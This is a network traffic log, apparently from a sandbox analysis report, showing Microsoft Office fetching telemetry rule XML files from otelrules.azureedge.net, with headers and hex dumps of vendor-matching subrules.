                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 467
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                  ETag: "0x8DC582BA6C038BC"
                  x-ms-request-id: bcb88dd7-c01e-0079-47cd-21e51a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-16849878b785g992cz2s9gk35c00000005u0000000003arh
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  19192.168.2.44976613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:03 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:03 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:03 GMT
                  Content-Type: text/xml
                  Content-Length: 486
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                  ETag: "0x8DC582BB344914B"
                  x-ms-request-id: dea3e99f-801e-0083-5056-23f0ae000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044803Z-r197bdfb6b4cz6xrsdncwtgzd40000000m50000000009pxe
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:03 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  20192.168.2.44976713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:03 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:03 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:03 GMT
                  Content-Type: text/xml
                  Content-Length: 427
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                  ETag: "0x8DC582BA310DA18"
                  x-ms-request-id: a11575a1-501e-007b-2115-245ba2000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044803Z-15b8d89586f2hk2885zk3a4enc0000000c8g0000000076kz
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:03 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                  Session IDSource IPSource PortDestination IPDestination Port
                  21192.168.2.44976513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:03 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:03 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:03 GMT
                  Content-Type: text/xml
                  Content-Length: 407
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                  ETag: "0x8DC582BBAD04B7B"
                  x-ms-request-id: 0d728fc6-301e-0000-17e3-21eecc000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044803Z-16849878b78jfqwd1dsrhqg3aw00000005rg00000000gnfr
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:03 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                  Session IDSource IPSource PortDestination IPDestination Port
                  22192.168.2.44976813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:03 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:03 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:03 GMT
                  Content-Type: text/xml
                  Content-Length: 486
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                  ETag: "0x8DC582B9018290B"
                  x-ms-request-id: 6ca7d158-d01e-0014-15ac-21ed58000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044803Z-16849878b784cpcc2dr9ch74ng00000005w0000000003yes
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:03 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  23192.168.2.44976913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:03 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:03 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:03 GMT
                  Content-Type: text/xml
                  Content-Length: 407
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                  ETag: "0x8DC582B9698189B"
                  x-ms-request-id: 7de7ed35-901e-005b-7c14-222005000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044803Z-16849878b786wvrz321uz1cknn00000005sg000000007up4
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:03 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                  Session IDSource IPSource PortDestination IPDestination Port
                  24192.168.2.44977113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:04 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:04 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:04 GMT
                  Content-Type: text/xml
                  Content-Length: 469
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                  ETag: "0x8DC582BBA701121"
                  x-ms-request-id: 89a40fd7-b01e-00ab-1aad-24dafd000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044804Z-15b8d89586fx2hlt035xdehq580000000ccg0000000071bv
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:04 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  25192.168.2.44977213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:04 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:04 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:04 GMT
                  Content-Type: text/xml
                  Content-Length: 415
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                  ETag: "0x8DC582BA41997E3"
                  x-ms-request-id: 3edebaab-e01e-0033-21c8-214695000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044804Z-16849878b78jfqwd1dsrhqg3aw00000005r000000000n9y0
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:04 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                  Session IDSource IPSource PortDestination IPDestination Port
                  26192.168.2.44977313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:04 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:04 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:04 GMT
                  Content-Type: text/xml
                  Content-Length: 477
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                  ETag: "0x8DC582BB8CEAC16"
                  x-ms-request-id: 4cd68789-d01e-0017-448e-21b035000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044804Z-16849878b78bkvbz1ry47zvsas00000005r000000000bmsr
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:04 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  27192.168.2.44977413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:04 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:04 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:04 GMT
                  Content-Type: text/xml
                  Content-Length: 464
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                  ETag: "0x8DC582B97FB6C3C"
                  x-ms-request-id: 214e4c48-901e-0048-7159-23b800000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044804Z-r197bdfb6b429k2s6br3k49qn400000002x0000000004y0k
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:04 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                  Session IDSource IPSource PortDestination IPDestination Port
                  28192.168.2.44977513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:04 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:04 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:04 GMT
                  Content-Type: text/xml
                  Content-Length: 494
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                  ETag: "0x8DC582BB7010D66"
                  x-ms-request-id: 968807c2-e01e-0052-0805-22d9df000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044804Z-16849878b782558xg5kpzay6es00000005p000000000csqd
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:04 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  29192.168.2.44977613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:05 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:05 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:05 GMT
                  Content-Type: text/xml
                  Content-Length: 419
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                  ETag: "0x8DC582B9748630E"
                  x-ms-request-id: ab91094f-501e-008f-72f7-219054000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044805Z-16849878b78dghrpt8v731n7r400000005fg00000000rbxm
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
